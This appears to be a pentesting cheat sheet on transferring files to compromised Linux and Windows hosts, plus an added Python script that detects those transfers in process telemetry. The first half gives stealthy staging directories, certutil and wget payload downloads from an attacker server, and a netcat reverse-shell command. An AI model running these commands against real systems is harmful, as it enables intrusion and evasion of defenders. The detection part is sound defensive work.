File Transfer
- On Linux, transfer files to `/dev/shm`
- On Windows, transfer files to `C:\Windows\Tasks`

These locations are chosen for file transfer because they are world-readable/writable/executable and stealthier than `/tmp` and `C:\Windows\Temp`.

On the attack machine, host a server:

```
updog
```

On the victim machine, download with `wget`:

```
wget http://<local_ip>/linpeas.sh
```

On the attack machine, host a server:

```
updog
```

On the victim machine, download with `certutil`:

```
certutil -urlcache -f http://<local_ip>/payload.exe payload.exe
```

If `certutil` is not on the compromised Windows machine, we can transfer files with an SMB server instead.

On Kali, create an SMB server:

```
impacket-smbserver ret2basic /usr/share/windows-resources/binaries/
```

Here `ret2basic` is the name of the share and `/usr/share/windows-resources/binaries/` is the directory that I want to host. On the compromised Windows machine:

```
net use * \\<local_ip>\ret2basic
Z:\nc.exe <local_ip> <local_port> -e cmd
```
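
From the defender's side, each transfer above leaves recognizable process-creation telemetry. The following added example (not part of the original page) flags those patterns over constructed events; the event field names (`host`, `image`, `cwd`, `command_line`), the rule names, and the sample hosts and addresses are assumptions.

```python
import re

# Staging directories named on this page, lower-cased with trailing separator.
STAGING_DIRS = ("/dev/shm/", "c:\\windows\\tasks\\")
# certutil accepts "-" or "/" as its switch prefix, so match both forms.
CERTUTIL_FETCH = re.compile(r"certutil(\.exe)?\b.*[-/]urlcache\b.*\bhttps?://", re.I)
DOWNLOADER = re.compile(r"\b(wget|curl)\b.*\bhttps?://", re.I)
# "net use" mapping a share on a host addressed by a raw IPv4 literal.
NET_USE_IP = re.compile(r"\bnet(\.exe)?\s+use\b.*\\\\\d{1,3}(\.\d{1,3}){3}\\", re.I)

def in_staging(path):
    """True if path is one of the staging directories or lies beneath one."""
    p = path.lower()
    return any(p.startswith(d) or p + d[-1] == d for d in STAGING_DIRS)

def classify(event):
    """Return the sorted rule names that fire for one process-creation event."""
    cmd, hits = event["command_line"], set()
    if in_staging(event["image"]):
        hits.add("exec-from-staging-dir")
    if DOWNLOADER.search(cmd) and in_staging(event.get("cwd", "")):
        hits.add("download-into-staging-dir")
    if CERTUTIL_FETCH.search(cmd):
        hits.add("certutil-url-download")
    if NET_USE_IP.search(cmd):
        hits.add("net-use-unc-by-ip")
    return sorted(hits)

def scan(events):
    """Return (host, rules) for every event that triggers at least one rule."""
    return [(e["host"], classify(e)) for e in events if classify(e)]

# Constructed sample events (hypothetical hosts, documentation-range IPs).
SAMPLE_EVENTS = [
    {"host": "web01", "image": "/usr/bin/wget", "cwd": "/dev/shm",
     "command_line": "wget http://192.0.2.10/script.sh"},
    {"host": "web01", "image": "/dev/shm/helper", "cwd": "/dev/shm",
     "command_line": "/dev/shm/helper"},
    {"host": "ws07", "image": "C:\\Windows\\System32\\certutil.exe",
     "command_line": "certutil -urlcache -f http://192.0.2.10/tool.exe tool.exe"},
    {"host": "ws07", "image": "C:\\Windows\\System32\\net.exe",
     "command_line": "net use * \\\\192.0.2.10\\tools"},
    {"host": "ws09", "image": "C:\\Windows\\System32\\certutil.exe",
     "command_line": "certutil -hashfile C:\\Users\\a\\file.iso SHA256"},
    {"host": "ws09", "image": "C:\\Windows\\System32\\net.exe",
     "command_line": "net use Z: \\\\fileserver01\\dept"},
]

print(scan(SAMPLE_EVENTS))
```

The two `ws09` events are benign uses of the same binaries (hashing a file, mapping a named file server) and are deliberately left unflagged.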